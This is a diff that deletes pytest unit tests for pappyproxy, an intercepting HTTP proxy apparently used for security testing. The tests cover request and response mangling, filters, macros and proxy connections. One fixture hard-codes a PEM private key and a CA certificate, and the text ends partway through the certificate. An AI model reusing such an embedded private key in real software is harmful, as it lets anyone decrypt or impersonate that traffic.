assert tfile_instance.write.call_args == ((r.full_request,),)
assert new_open.called
assert fake_file.read.called
assert new_req.full_request == new_contents
@pytest.inlineCallbacks
def test_mangle_request_edit_newlines(req, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req
new_contents = ('GET / HTTP/1.1\r\n'
'Test-Head: FOOBIE\n'
'Content-Length: 4\n\r\n'
'BBBB')
fake_file.read.return_value = new_contents
new_req = yield async_mangle_request(r)
assert new_req.full_request == ('GET / HTTP/1.1\r\n'
'Test-Head: FOOBIE\r\n'
'Content-Length: 4\r\n\r\n'
'BBBB')
assert new_req.headers['Test-Head'] == 'FOOBIE'
@pytest.inlineCallbacks
def test_mangle_request_drop(req, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req
new_contents = ''
fake_file.read.return_value = new_contents
new_req = yield async_mangle_request(r)
assert new_req is None
@pytest.inlineCallbacks
def test_mangle_request_edit_len(req, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req
new_contents = ('GET / HTTP/1.1\r\n'
'Test-Head: FOOBIE\n'
'Content-Length: 4\n\r\n'
'BBBBAAAA')
fake_file.read.return_value = new_contents
new_req = yield async_mangle_request(r)
assert new_req.full_request == ('GET / HTTP/1.1\r\n'
'Test-Head: FOOBIE\r\n'
'Content-Length: 8\r\n\r\n'
'BBBBAAAA')
#########################
## Test response mangling
@pytest.inlineCallbacks
def test_mangle_response_edit(req_w_rsp, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is on, edit
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req_w_rsp
old_rsp = r.response.full_response
new_contents = ('HTTP/1.1 403 NOTOKIEDOKIE\r\n'
'Content-Length: 4\r\n'
'Other-Header: foobles\r\n\r\n'
'BBBB')
fake_file.read.return_value = new_contents
mangled_rsp = yield async_mangle_response(r)
assert not mock_deep_save.called
assert tfile_obj.called
assert tfile_instance.write.called
assert tfile_instance.write.call_args == ((old_rsp,),)
assert new_open.called
assert fake_file.read.called
assert mangled_rsp.full_response == new_contents
@pytest.inlineCallbacks
def test_mangle_response_newlines(req_w_rsp, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req_w_rsp
old_rsp = r.response.full_response
new_contents = ('HTTP/1.1 403 NOTOKIEDOKIE\n'
'Content-Length: 4\n'
'Other-Header: foobles\r\n\n'
'BBBB')
fake_file.read.return_value = new_contents
mangled_rsp = yield async_mangle_response(r)
assert mangled_rsp.full_response == ('HTTP/1.1 403 NOTOKIEDOKIE\r\n'
'Content-Length: 4\r\n'
'Other-Header: foobles\r\n\r\n'
'BBBB')
assert mangled_rsp.headers['Other-Header'] == 'foobles'
@pytest.inlineCallbacks
def test_mangle_response_drop(req_w_rsp, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req_w_rsp
old_rsp = r.response.full_response
new_contents = ''
fake_file.read.return_value = new_contents
mangled_rsp = yield async_mangle_response(r)
assert mangled_rsp is None
@pytest.inlineCallbacks
def test_mangle_response_new_len(req_w_rsp, mock_deep_save, mock_tempfile,
ignore_edit, ignore_delete):
# Intercepting is off, request in scope
tfile_obj, tfile_instance, new_open, fake_file = mock_tempfile
r = req_w_rsp
old_rsp = r.response.full_response
new_contents = ('HTTP/1.1 403 NOTOKIEDOKIE\n'
'Content-Length: 4\n'
'Other-Header: foobles\r\n\n'
'BBBBAAAA')
fake_file.read.return_value = new_contents
mangled_rsp = yield async_mangle_response(r)
assert mangled_rsp.full_response == ('HTTP/1.1 403 NOTOKIEDOKIE\r\n'
'Content-Length: 8\r\n'
'Other-Header: foobles\r\n\r\n'
'BBBBAAAA')

View file

@ -1,124 +0,0 @@
import base64
import pytest
import mock
import json
import datetime
import pappyproxy
from pappyproxy.util import PappyException
from pappyproxy.comm import CommServer
from pappyproxy.http import Request, Response
from testutil import mock_deferred, func_deleted, TLSStringTransport, freeze, mock_int_macro, no_tcp
@pytest.fixture(autouse=True)
def no_int_macros(mocker):
mocker.patch('pappyproxy.plugin.active_intercepting_macros').return_value = {}
@pytest.fixture
def http_request():
req = Request('GET / HTTP/1.1\r\n\r\n')
req.host = 'www.foo.faketld'
req.port = '1337'
req.is_ssl = True
req.reqid = 123
rsp = Response('HTTP/1.1 200 OK\r\n\r\n')
req.response = rsp
return req
def perform_comm(line):
serv = CommServer()
serv.transport = TLSStringTransport()
serv.lineReceived(line)
n = datetime.datetime.now()
while serv.transport.value() == '':
t = datetime.datetime.now()
if (t-n).total_seconds() > 5:
raise Exception("Request timed out")
return serv.transport.value()
def test_simple():
v = perform_comm('{"action": "ping"}')
assert json.loads(v) == {'ping': 'pong', 'success': True}
def mock_loader(rsp):
def f(*args, **kwargs):
return rsp
return classmethod(f)
def mock_submitter(rsp):
def f(_, req, *args, **kwargs):
req.response = rsp
req.reqid = 123
return mock_deferred(req)
return classmethod(f)
def mock_loader_fail():
def f(*args, **kwargs):
raise PappyException("lololo message don't exist dawg")
return classmethod(f)
def test_get_request(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'load_request', new=mock_loader(http_request))
v = perform_comm('{"action": "get_request", "reqid": "1"}')
expected_data = json.loads(http_request.to_json())
expected_data['success'] = True
assert json.loads(v) == expected_data
def test_get_request_fail(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'load_request', new=mock_loader_fail())
v = json.loads(perform_comm('{"action": "get_request", "reqid": "1"}'))
assert v['success'] == False
assert 'message' in v
def test_get_response(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'load_request', new=mock_loader(http_request))
mocker.patch.object(pappyproxy.http.Response, 'load_response', new=mock_loader(http_request.response))
v = perform_comm('{"action": "get_response", "reqid": "1"}')
expected_data = json.loads(http_request.response.to_json())
expected_data['success'] = True
assert json.loads(v) == expected_data
def test_get_response_fail(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'load_request', new=mock_loader(http_request))
mocker.patch.object(pappyproxy.http.Response, 'load_response', new=mock_loader_fail())
v = json.loads(perform_comm('{"action": "get_response", "reqid": "1"}'))
assert v['success'] == False
assert 'message' in v
def test_submit_request(mocker, http_request):
rsp = Response('HTTP/1.1 200 OK\r\n\r\n')
mocker.patch.object(pappyproxy.http.Request, 'submit_request', new=mock_submitter(rsp))
mocker.patch('pappyproxy.http.Request.async_deep_save').return_value = mock_deferred()
comm_data = {"action": "submit"}
comm_data['host'] = http_request.host
comm_data['port'] = http_request.port
comm_data['is_ssl'] = http_request.is_ssl
comm_data['full_message'] = base64.b64encode(http_request.full_message)
comm_data['tags'] = ['footag']
v = perform_comm(json.dumps(comm_data))
expected_data = {}
expected_data[u'request'] = json.loads(http_request.to_json())
expected_data[u'response'] = json.loads(http_request.response.to_json())
expected_data[u'success'] = True
expected_data[u'request'][u'tags'] = [u'footag']
assert json.loads(v) == expected_data
def test_submit_request_fail(mocker, http_request):
mocker.patch.object(pappyproxy.http.Request, 'submit_request', new=mock_loader_fail())
mocker.patch('pappyproxy.http.Request.async_deep_save').return_value = mock_deferred()
comm_data = {"action": "submit"}
comm_data['full_message'] = base64.b64encode('HELLO THIS IS REQUEST\r\nWHAT IS HEADER FORMAT\r\n')
v = json.loads(perform_comm(json.dumps(comm_data)))
print v
assert v['success'] == False
assert 'message' in v

View file

@ -1,391 +0,0 @@
import pytest
from pappyproxy import context
from pappyproxy.http import Request, Response, ResponseCookie
@pytest.fixture
def http_request():
return Request('GET / HTTP/1.1\r\n')
def test_filter_reqs():
pass
def test_gen_filter_by_all_request():
f = context.gen_filter_by_all(['ct', 'hello'])
fn = context.gen_filter_by_all(['nct', 'hello'])
# Nowhere
r = Request('GET / HTTP/1.1\r\n')
assert not f(r)
assert fn(r)
# Verb
r = Request('hello / HTTP/1.1\r\n')
assert f(r)
assert not fn(r)
# Path
r = Request('GET /hello HTTP/1.1\r\n')
assert f(r)
assert not fn(r)
# Data
r = Request('GET / HTTP/1.1\r\n')
r.body = 'hello'
assert f(r)
assert not fn(r)
# Header key
r = Request('GET / HTTP/1.1\r\n')
r.headers['hello'] = 'goodbye'
assert f(r)
assert not fn(r)
# Header value
r = Request('GET / HTTP/1.1\r\n')
r.headers['goodbye'] = 'hello'
assert f(r)
assert not fn(r)
# Nowhere in headers
r = Request('GET / HTTP/1.1\r\n')
r.headers['goodbye'] = 'for real'
assert not f(r)
assert fn(r)
# Cookie key
r = Request('GET / HTTP/1.1\r\n')
r.cookies['hello'] = 'world'
assert f(r)
assert not fn(r)
# Cookie value
r = Request('GET / HTTP/1.1\r\n')
r.cookies['world'] = 'hello'
assert f(r)
assert not fn(r)
# Nowhere in cookie
r = Request('GET / HTTP/1.1\r\n')
r.cookies['world'] = 'sucks'
assert not f(r)
assert fn(r)
def test_gen_filter_by_all_response(http_request):
f = context.gen_filter_by_all(['ct', 'hello'])
fn = context.gen_filter_by_all(['nct', 'hello'])
# Nowhere
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
assert not f(http_request)
assert fn(http_request)
# Response text
r = Response('HTTP/1.1 200 hello\r\n')
http_request.response = r
assert f(http_request)
assert not fn(http_request)
# Data
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.body = 'hello'
assert f(http_request)
assert not fn(http_request)
# Header key
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.headers['hello'] = 'goodbye'
assert f(http_request)
assert not fn(http_request)
# Header value
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.headers['goodbye'] = 'hello'
assert f(http_request)
assert not fn(http_request)
# Nowhere in headers
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.headers['goodbye'] = 'for real'
assert not f(http_request)
assert fn(http_request)
# Cookie key
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.add_cookie(ResponseCookie('hello=goodbye'))
assert f(http_request)
assert not fn(http_request)
# Cookie value
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.add_cookie(ResponseCookie('goodbye=hello'))
assert f(http_request)
assert not fn(http_request)
# Nowhere in cookie
r = Response('HTTP/1.1 200 OK\r\n')
http_request.response = r
r.add_cookie(ResponseCookie('goodbye=for real'))
assert not f(http_request)
assert fn(http_request)
def test_filter_by_host(http_request):
f = context.gen_filter_by_host(['ct', 'sexy'])
fn = context.gen_filter_by_host(['nct', 'sexy'])
http_request.headers['Host'] = 'google.com'
http_request.headers['MiscHeader'] = 'vim.sexy'
assert not f(http_request)
assert fn(http_request)
http_request.headers['Host'] = 'vim.sexy'
assert http_request.host == 'vim.sexy'
assert f(http_request)
assert not fn(http_request)
def test_filter_by_body():
f = context.gen_filter_by_body(['ct', 'sexy'])
fn = context.gen_filter_by_body(['nct', 'sexy'])
# Test request bodies
r = Request()
r.start_line = 'GET /sexy HTTP/1.1'
r.headers['Header'] = 'sexy'
r.body = 'foo'
assert not f(r)
assert fn(r)
r.body = 'sexy'
assert f(r)
assert not fn(r)
# Test response bodies
r = Request()
rsp = Response()
rsp.start_line = 'HTTP/1.1 200 OK'
rsp.headers['sexy'] = 'sexy'
r.start_line = 'GET /sexy HTTP/1.1'
r.headers['Header'] = 'sexy'
r.response = rsp
assert not f(r)
assert fn(r)
rsp.body = 'sexy'
assert f(r)
assert not fn(r)
def test_filter_by_response_code(http_request):
f = context.gen_filter_by_response_code(['eq', '200'])
fn = context.gen_filter_by_response_code(['neq', '200'])
r = Response()
http_request.response = r
r.start_line = 'HTTP/1.1 404 Not Found'
assert not f(http_request)
assert fn(http_request)
r.start_line = 'HTTP/1.1 200 OK'
assert f(http_request)
assert not fn(http_request)
def test_filter_by_raw_headers_request():
f1 = context.gen_filter_by_raw_headers(['ct', 'Sexy:'])
fn1 = context.gen_filter_by_raw_headers(['nct', 'Sexy:'])
f2 = context.gen_filter_by_raw_headers(['ct', 'sexy\r\nHeader'])
fn2 = context.gen_filter_by_raw_headers(['nct', 'sexy\r\nHeader'])
r = Request('GET / HTTP/1.1\r\n')
rsp = Response('HTTP/1.1 200 OK\r\n')
r.response = rsp
r.headers['Header'] = 'Sexy'
assert not f1(r)
assert fn1(r)
assert not f2(r)
assert fn2(r)
r = Request('GET / HTTP/1.1\r\n')
rsp = Response('HTTP/1.1 200 OK\r\n')
r.response = rsp
r.headers['Sexy'] = 'sexy'
assert f1(r)
assert not fn1(r)
assert not f2(r)
assert fn2(r)
r.headers['OtherHeader'] = 'sexy'
r.headers['Header'] = 'foo'
assert f1(r)
assert not fn1(r)
assert f2(r)
assert not fn2(r)
def test_filter_by_raw_headers_response():
f1 = context.gen_filter_by_raw_headers(['ct', 'Sexy:'])
fn1 = context.gen_filter_by_raw_headers(['nct', 'Sexy:'])
f2 = context.gen_filter_by_raw_headers(['ct', 'sexy\r\nHeader'])
fn2 = context.gen_filter_by_raw_headers(['nct', 'sexy\r\nHeader'])
r = Request('GET / HTTP/1.1\r\n')
rsp = Response('HTTP/1.1 200 OK\r\n')
r.response = rsp
rsp.headers['Header'] = 'Sexy'
assert not f1(r)
assert fn1(r)
assert not f2(r)
assert fn2(r)
r = Request('GET / HTTP/1.1\r\n')
rsp = Response('HTTP/1.1 200 OK\r\n')
r.response = rsp
rsp.headers['Sexy'] = 'sexy'
assert f1(r)
assert not fn1(r)
assert not f2(r)
assert fn2(r)
rsp.headers['OtherHeader'] = 'sexy'
rsp.headers['Header'] = 'foo'
assert f1(r)
assert not fn1(r)
assert f2(r)
assert not fn2(r)
def test_filter_by_path(http_request):
f = context.gen_filter_by_path(['ct', 'porn']) # find the fun websites
fn = context.gen_filter_by_path(['nct', 'porn']) # find the boring websites
http_request.start_line = 'GET / HTTP/1.1'
assert not f(http_request)
assert fn(http_request)
http_request.start_line = 'GET /path/to/great/porn HTTP/1.1'
assert f(http_request)
assert not fn(http_request)
http_request.start_line = 'GET /path/to/porn/great HTTP/1.1'
assert f(http_request)
assert not fn(http_request)
def test_gen_filter_by_submitted_cookies():
f1 = context.gen_filter_by_submitted_cookies(['ct', 'Session'])
f2 = context.gen_filter_by_submitted_cookies(['ct', 'Cookie', 'nct', 'CookieVal'])
r = Request(('GET / HTTP/1.1\r\n'
'Cookie: foo=bar\r\n'
'\r\n'))
assert not f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Cookie: Session=bar\r\n'
'\r\n'))
assert f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Cookie: Session=bar; CookieThing=NoMatch\r\n'
'\r\n'))
assert f1(r)
assert f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Cookie: Session=bar; CookieThing=CookieValue\r\n'
'\r\n'))
assert f1(r)
assert not f2(r)
def test_gen_filter_by_set_cookies():
f1 = context.gen_filter_by_set_cookies(['ct', 'Session'])
f2 = context.gen_filter_by_set_cookies(['ct', 'Cookie', 'ct', 'CookieVal'])
r = Request('GET / HTTP/1.1\r\n\r\n')
rsp = Response(('HTTP/1.1 200 OK\r\n'
'Set-Cookie: foo=bar\r\n'
'\r\n'))
r.response = rsp
assert not f1(r)
assert not f2(r)
r = Request('GET / HTTP/1.1\r\n\r\n')
rsp = Response(('HTTP/1.1 200 OK\r\n'
'Set-Cookie: foo=bar\r\n'
'Set-Cookie: Session=Banana\r\n'
'\r\n'))
r.response = rsp
assert f1(r)
assert not f2(r)
r = Request('GET / HTTP/1.1\r\n\r\n')
rsp = Response(('HTTP/1.1 200 OK\r\n'
'Set-Cookie: foo=bar\r\n'
'Set-Cookie: Session=Banana\r\n'
'Set-Cookie: CookieThing=NoMatch\r\n'
'\r\n'))
r.response = rsp
assert f1(r)
assert not f2(r)
r = Request('GET / HTTP/1.1\r\n\r\n')
rsp = Response(('HTTP/1.1 200 OK\r\n'
'Set-Cookie: foo=bar\r\n'
'Set-Cookie: Session=Banana\r\n'
'Set-Cookie: CookieThing=CookieValue\r\n'
'\r\n'))
r.response = rsp
assert f1(r)
assert f2(r)
def test_filter_by_params_get():
f1 = context.gen_filter_by_params(['ct', 'Session'])
f2 = context.gen_filter_by_params(['ct', 'Cookie', 'ct', 'CookieVal'])
r = Request('GET / HTTP/1.1\r\n\r\n')
assert not f1(r)
assert not f2(r)
r = Request('GET /?Session=foo HTTP/1.1\r\n\r\n')
assert f1(r)
assert not f2(r)
r = Request('GET /?Session=foo&CookieThing=Fail HTTP/1.1\r\n\r\n')
assert f1(r)
assert not f2(r)
r = Request('GET /?Session=foo&CookieThing=CookieValue HTTP/1.1\r\n\r\n')
assert f1(r)
assert f2(r)
def test_filter_by_params_post():
f1 = context.gen_filter_by_params(['ct', 'Session'])
f2 = context.gen_filter_by_params(['ct', 'Cookie', 'ct', 'CookieVal'])
r = Request(('GET / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n\r\n'))
r.body = 'foo=bar'
assert not f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n\r\n'))
r.body = 'Session=bar'
assert f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n\r\n'))
r.body = 'Session=bar&Cookie=foo'
assert f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n\r\n'))
r.body = 'Session=bar&CookieThing=CookieValue'
assert f1(r)
assert f2(r)

View file

@ -1,62 +0,0 @@
import os
import pytest
import random
import string
from pappyproxy.session import Session
from pappyproxy.crypto import Crypto
from pappyproxy.config import PappyConfig
@pytest.fixture
def conf():
c = PappyConfig()
return c
@pytest.fixture
def crypt():
c = Crypto(conf())
return c
@pytest.fixture
def tmpname():
cns = string.ascii_lowercase + string.ascii_uppercase + string.digits
tn = ''
for i in xrange(8):
tn += cns[random.randint(0,len(cns)-1)]
return tn
tmpdir = '/tmp/test_crypto'+tmpname()
tmpfiles = ['cmdhistory', 'config.json', 'data.db']
tmp_pass = 'fugyeahbruh'
def stub_files():
enter_tmpdir()
for sf in tmpfiles:
with os.fdopen(os.open(sf, os.O_CREAT, 0o0600), 'r'):
pass
def enter_tmpdir():
if not os.path.isdir(tmpdir):
os.mkdir(tmpdir)
os.chdir(tmpdir)
def test_decrypt_tmpdir():
enter_tmpdir()
c = crypt()
# Stub out the password, working with stdout is a pain with pytest
c.password = tmp_pass
c.decrypt_project()
assert os.path.isdir(os.path.join(os.getcwd(), '../crypt'))
def test_decrypt_copy_files():
enter_tmpdir()
stub_files()
c = crypt()
# Stub out the password, working with stdout is a pain with pytest
c.password = tmp_pass
c.decrypt_project()
for tf in tmpfiles:
assert os.path.isfile(os.path.join(os.getcwd(),tf))

File diff suppressed because it is too large

View file

@ -1,65 +0,0 @@
import pytest
import string
import mock
from collections import OrderedDict
from testutil import mock_deferred, func_deleted, TLSStringTransport, freeze, mock_int_macro, no_tcp
from pappyproxy.http import Request, Response
from pappyproxy import macros
class CloudToButtMacro(macros.InterceptMacro):
def __init__(self):
macros.InterceptMacro.__init__(self)
self.intercept_requests = True
self.intercept_responses = True
def mangle_request(self, request):
return Request(string.replace(request.full_message, 'cloud', 'butt'))
def mangle_response(self, response):
return Response(string.replace(response.full_message, 'cloud', 'butt'))
@pytest.fixture
def httprequest():
return Request(('POST /test-request HTTP/1.1\r\n'
'Content-Length: 4\r\n'
'\r\n'
'AAAA'))
@pytest.inlineCallbacks
def test_mangle_request_simple(httprequest):
orig_req = httprequest.copy() # in case it gets mangled
(new_req, mangled) = yield macros.mangle_request(orig_req, {})
assert new_req == orig_req
assert httprequest == orig_req
assert not mangled
@pytest.inlineCallbacks
def test_mangle_request_single(httprequest):
orig_req = httprequest.copy() # in case it gets mangled
macro = mock_int_macro(modified_req=('GET /modified HTTP/1.1\r\n\r\n'))
expected_req = Request('GET /modified HTTP/1.1\r\n\r\n')
(new_req, mangled) = yield macros.mangle_request(orig_req, {'testmacro': macro})
assert new_req == expected_req
assert httprequest == orig_req
assert httprequest.unmangled is None
assert new_req.unmangled == orig_req
assert mangled
@pytest.inlineCallbacks
def test_mangle_request_multiple(httprequest):
orig_req = httprequest.copy() # in case it gets mangled
macro = mock_int_macro(modified_req=('GET /cloud HTTP/1.1\r\n\r\n'))
macro2 = CloudToButtMacro()
intmacros = OrderedDict()
intmacros['testmacro'] = macro
intmacros['testmacro2'] = macro2
(new_req, mangled) = yield macros.mangle_request(orig_req, intmacros)
expected_req = Request('GET /butt HTTP/1.1\r\n\r\n')
assert new_req == expected_req
assert httprequest == orig_req
assert httprequest.unmangled is None
assert new_req.unmangled == orig_req
assert mangled

View file

@ -1,422 +0,0 @@
import pytest
import mock
import random
import datetime
import pappyproxy
import base64
import collections
from pappyproxy import http
from pappyproxy.proxy import ProxyClientFactory, ProxyServerFactory, UpstreamHTTPProxyClient
from pappyproxy.http import Request, Response
from pappyproxy.macros import InterceptMacro
from testutil import mock_deferred, func_deleted, TLSStringTransport, freeze, mock_int_macro, no_tcp
from twisted.internet import defer
class InterceptMacroTest(InterceptMacro):
def __init__(self, new_req=None, new_rsp=None):
InterceptMacro.__init__(self)
self.new_req = None
self.new_rsp = None
if new_req:
self.intercept_requests = True
self.new_req = new_req
if new_rsp:
self.intercept_responses = True
self.new_rsp = new_rsp
def mangle_request(self, request):
if self.intercept_requests:
return self.new_req
else:
return request
def mangle_response(self, request):
if self.intercept_responses:
return self.new_rsp
else:
return request.response
class TestProxyConnection(object):
@property
def client_protocol(self):
if 'protocol' not in self.conn_info:
raise Exception('Connection to server not made. Cannot write data as server.')
return self.conn_info['protocol']
@property
def client_factory(self):
if 'protocol' not in self.conn_info:
raise Exception('Connection to server not made. Cannot write data as server.')
return self.conn_info['factory']
def setUp(self, mocker, int_macros={}, socks_config=None, http_config=None, in_scope=True):
self.mocker = mocker
self.conn_info = {}
# Mock config
self.mock_config = pappyproxy.config.PappyConfig()
self.mock_config.socks_proxy = socks_config
self.mock_config.http_proxy = http_config
self.mock_session = pappyproxy.pappy.PappySession(self.mock_config)
mocker.patch.object(pappyproxy.pappy, 'session', new=self.mock_session)
mocker.patch("pappyproxy.proxy.load_certs_from_dir", new=mock_generate_cert)
# Listening server
self.server_factory = ProxyServerFactory()
self.server_factory.save_all = True
self.server_factory.intercepting_macros = int_macros
self.server_protocol = self.server_factory.buildProtocol(('127.0.0.1', 0))
self.server_transport = TLSStringTransport()
self.server_protocol.makeConnection(self.server_transport)
# Other mocks
self.req_save = mocker.patch.object(pappyproxy.http.Request, 'async_deep_save', autospec=True, side_effect=mock_req_async_save)
self.submit_request = mocker.patch('pappyproxy.http.Request.submit_request',
new=self.gen_mock_submit_request())
self.get_endpoint = mocker.patch('pappyproxy.proxy.get_endpoint')
self.in_scope = mocker.patch('pappyproxy.context.in_scope').return_value = in_scope
def gen_mock_submit_request(self):
orig = Request.submit_request
def f(request, save_request=False, intercepting_macros={}, stream_transport=None):
return orig(request, save_request=save_request,
intercepting_macros=intercepting_macros,
stream_transport=stream_transport,
_factory_string_transport=True,
_conn_info=self.conn_info)
return f
def perform_connect_request(self):
self.write_as_browser('CONNECT https://www.AAAA.BBBB:443 HTTP/1.1\r\n\r\n')
assert self.read_as_browser() == 'HTTP/1.1 200 Connection established\r\n\r\n'
def write_as_browser(self, data):
self.server_protocol.dataReceived(data)
def read_as_browser(self):
s = self.server_protocol.transport.value()
self.server_protocol.transport.clear()
return s
def write_as_server(self, data):
self.client_protocol.dataReceived(data)
def read_as_server(self):
s = self.client_protocol.transport.value()
self.client_protocol.transport.clear()
return s
def mock_req_async_save(req):
req.reqid = str(random.randint(1,1000000))
return mock_deferred()
def mock_mangle_response_side_effect(new_rsp):
def f(request, mangle_macros):
request.response = new_rsp
return mock_deferred(True)
return f
def mock_generate_cert(cert_dir):
private_key = ('-----BEGIN PRIVATE KEY-----\n'
'MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQDAoClrYUEB7lM0\n'
'zQaKkXZVG2d1Bu9hV8urpx0gNXMbyZ2m3xb+sKZju/FHPuWenA4KaN5gRUT+oLfv\n'
'tnF6Ia0jpRNWnX0Fyn/irdg1BWGJn7k7mJ2D0NXZQczn2+xxY05599NfGWqNKCYy\n'
'jhSwPsUK+sGJqi7aSDdlS97ZTjrQVTTFsC0+kSu4lS5fsWXxqrKLa6Ao8W7abVRO\n'
'JHazh/cxM4UKpgWU+E6yD4o4ZgHY+SMTVUh/IOM8DuOVyLEWtx4oLNiLMlpWT3qy\n'
'4IMpOF6VuU6JF2HGV13SoJfhsLXsPRbLVTAnZvJcZwtgDm6NfKapU8W8olkDV1Bf\n'
'YQEMSNX7AgMBAAECggEBAII0wUrAdrzjaIMsg9tu8FofKBPHGFDok9f4Iov/FUwX\n'
'QOXnrxeCOTb5d+L89SH9ws/ui0LwD+8+nJcA8DvqP6r0jtnhov0jIMcNVDSi6oeo\n'
'3AEY7ICJzcQJ4oRn+K+8vPNdPhfuikPYe9l4iSuJgpAlaGWyD/GlFyz12DFz2/Wu\n'
'NIcqR1ucvezRHn3eGMtvDv2WGaN4ifUc30k8XgSUesmwSI6beb5+hxq7wXfsurnP\n'
'EUrPY9ts3lfiAgxzTKOuj1VR5hn7cJyLN8jF0mZs4D6eSSHorIddhmaNiCq5ZbMd\n'
'QdlDiPvnXHT41OoXOb7tDEt7SGoiRh2noCZ1aZiSziECgYEA+tuPPLYWU6JRB6EW\n'
'PhbcXQbh3vML7eT1q7DOz0jYCojgT2+k7EWSI8T830oQyjbpe3Z86XEgH7UBjUgq\n'
'27nJ4E6dQDYGbYCKEklOoCGLE7A60i1feIz8otOQRrbQ4jcpibEgscA6gzHmunYf\n'
'De5euUgYW+Rq2Vmr6/NzUaUgui8CgYEAxJMDwPOGgiLM1cczlaSIU9Obz+cVnwWn\n'
'nsdKYMto2V3yKLydDfjsgOgzxHOxxy+5L645TPxK6CkiISuhJ93kAFFtx+1sCBCT\n'
'tVzY5robVAekxA9tlPIxtsn3+/axx3n6HnV0oA/XtxkuOS5JImgEdXqFwJZkerGE\n'
'waftIU2FCfUCgYEArl8+ErJzlJEIiCgWIPSdGuD00pfZW/TCPCT7rKRy3+fDHBR7\n'
'7Gxzp/9+0utV/mnrJBH5w/8JmGCmgoF+oRtk01FyBzdGgolN8GYajD6kwPvH917o\n'
'tRAzcC9lY3IigoxbiEWid0wqoBVoz4XaEkH2gA44OG/vQcQOOEYSi9cfh6sCgYBg\n'
'KLaOXdJvuIxRCzgNvMW/k+VFh3pJJx//COg2f2qT4mQCT3nYiutOh8hDEoFluc+y\n'
'Jlz7bvNJrE14wnn8IYxWJ383bMoLC+jlsDyeaW3S5kZQbmehk/SDwTrg86W1udKD\n'
'sdtSLU3N0LCO4jh+bzm3Ki9hrXALoOkbPoU+ZEhvPQKBgQDf79XQ3RNxZSk+eFyq\n'
'qD8ytVqxEoD+smPDflXXseVH6o+pNWrF8+A0KqmO8c+8KVzWj/OfULO6UbKd3E+x\n'
'4JGkWu9yF1lEgtHgibF2ER8zCSIL4ikOEasPCkrKj5SrS4Q+j4u5ha76dIc2CVu1\n'
'hkX2PQ1xU4ocu06k373sf73A4Q==\n'
'-----END PRIVATE KEY-----')
ca_key = ('-----BEGIN CERTIFICATE-----\n'
'MIIDjzCCAncCFQCjC8r+I4xa7JoGUJYGOTcqDROA0DANBgkqhkiG9w0BAQsFADBg\n'
'MQswCQYDVQQGEwJVUzERMA8GA1UECBMITWljaGlnYW4xEjAQBgNVBAcTCUFubiBB\n'
'cmJvcjEUMBIGA1UEChMLUGFwcHkgUHJveHkxFDASBgNVBAMTC1BhcHB5IFByb3h5\n'
'MB4XDTE1MTEyMDIxMTEzOVoXDTI1MTExNzIxMTEzOVowYDELMAkGA1UEBhMCVVMx\n'
'ETAPBgNVBAgTCE1pY2hpZ2FuMRIwEAYDVQQHEwlBbm4gQXJib3IxFDASBgNVBAoT\n'
'C1BhcHB5IFByb3h5MRQwEgYDVQQDEwtQYXBweSBQcm94eTCCASIwDQYJKoZIhvcN\n'
'AQEBBQADggEPADCCAQoCggEBAMCgKWthQQHuUzTNBoqRdlUbZ3UG72FXy6unHSA1\n'
'cxvJnabfFv6wpmO78Uc+5Z6cDgpo3mBFRP6gt++2cXohrSOlE1adfQXKf+Kt2DUF\n'
'YYmfuTuYnYPQ1dlBzOfb7HFjTnn3018Zao0oJjKOFLA+xQr6wYmqLtpIN2VL3tlO\n'
'OtBVNMWwLT6RK7iVLl+xZfGqsotroCjxbtptVE4kdrOH9zEzhQqmBZT4TrIPijhm\n'
'Adj5IxNVSH8g4zwO45XIsRa3Higs2IsyWlZPerLggyk4XpW5TokXYcZXXdKgl+Gw\n'
'tew9FstVMCdm8lxnC2AObo18pqlTxbyiWQNXUF9hAQxI1fsCAwEAAaNFMEMwEgYD\n'
'VR0TAQH/BAgwBgEB/wIBADAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFNo5o+5e\n'
'a0sNMlW/75VgGJCv2AcJMA0GCSqGSIb3DQEBCwUAA4IBAQBdJDhxbmoEe27bD8me\n'
'YTcLGjs/StKkSil7rLbX+tBCwtkm5UEEejBuAhKk2FuAXW8yR1FqKJSZwVCAocBT\n'
'Bo/+97Ee+h7ywrRFhATEr9D/TbbHKOjCjDzOMl9yLZa2DKErZjbI30ZD6NafWS/X\n'
